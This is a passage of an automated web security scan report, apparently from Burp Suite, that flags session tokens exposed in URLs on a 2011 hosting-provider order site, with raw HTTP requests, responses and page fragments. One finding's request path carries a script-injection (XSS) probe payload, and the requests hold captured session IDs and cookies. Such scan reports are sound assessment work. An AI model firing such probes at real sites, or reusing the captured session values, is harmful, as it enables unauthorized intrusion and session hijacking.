<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrCitysearch;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Citysearch&reg;
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrSesub;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Simple Submission
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrStat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebStatistics
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMailinglist;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Mailing List
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsNewsletter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 E-mail Marketing Tool
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingRss;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Easy RSS
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsChat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Chat Channels
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsDialogue;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
In2site Live Dialogue
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSecurityCertificate;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
GeoTrust Dedicated SSL Certificate
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureGuaranteeMoneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
90-Day Money Back Guarantee
</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p>** See <a rel="height=350, width=665" class="window-open" href="/xml/order/popupTcGoogleAdwords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">T&amp;C</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=MsHosting&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.85. http://order.1and1.com/xml/order/MsHosting  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.86. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e;jsessionid=8AC1FFB321E88045E58D20D05D6B2648.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://burp/show/16
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCoeJlZ2PC8wLCswLSosJiYkJig=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:5:AAABLtRV*lKZz6xm29DD7n8Tbz9KytaA:1300642527826; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; __PFIX_TST_=5b6bb06549f8a000

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 17:36:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1439

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>1&amp;1 Internet AG - Page or Document not found</title>
<meta h
...[SNIP]...

3.87. http://order.1and1.com/xml/order/News  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:15 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=AZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:52:22 GMT; Path=/
ETag: edde5942d29d19678a705797aa76065e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28632


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=News&amp;linkOrigin=News&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=News&amp;page=switch&amp;linkOrigin=News&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Microsoft Sharepoint</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Service &amp; Support</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">International Customers</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">iStockphoto</a>
...[SNIP]...
<li class="lastItem-NoBorder two-rows"><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Awards &amp; Recognition</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_cnb.gif" alt="" width="126" height="90">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_vps.jpg" alt="" width="130" height="90">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSearchAdvertisingOffer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_marketingcenter.jpg" alt="" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSearchAdvertisingOffer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_istock.gif" alt="" style="float: right; margin-left: 10px;" width="115" height="31">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_blog.jpg" alt="1&amp;1 Blog" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_map.jpg" alt="1&amp;1 Geographic Map" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_no1webhost.jpg" alt="No. 1 Web Host" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">View awards &amp; recognition</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupMsGold;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/new_microsoftgold.gif" alt="Microsoft Gold Partner" style="float: right; margin-left: 10px;padding:5px;background:#e9f0fa" width="130" height="63">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupMsGold;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSymantec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/new_symantec_freetrial_small.jpg" alt="1&amp;1 Dynamic Content Library" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSymantec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_enhancedhosting.jpg" alt="" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_wsb_new.jpg" alt="" style="float: right; margin-left: 10px;" width="129" height="66">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_photogallery_new.jpg" alt="1&amp;1 Dynamic Content Library" style="float: right; margin-left: 10px;" width="129" height="66">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=News&amp;linkOrigin=News&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.88. http://order.1and1.com/xml/order/News  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:15 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=AZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:52:22 GMT; Path=/
ETag: edde5942d29d19678a705797aa76065e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28632


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.89. http://order.1and1.com/xml/order/PrivacyPolicy  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.privacypolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
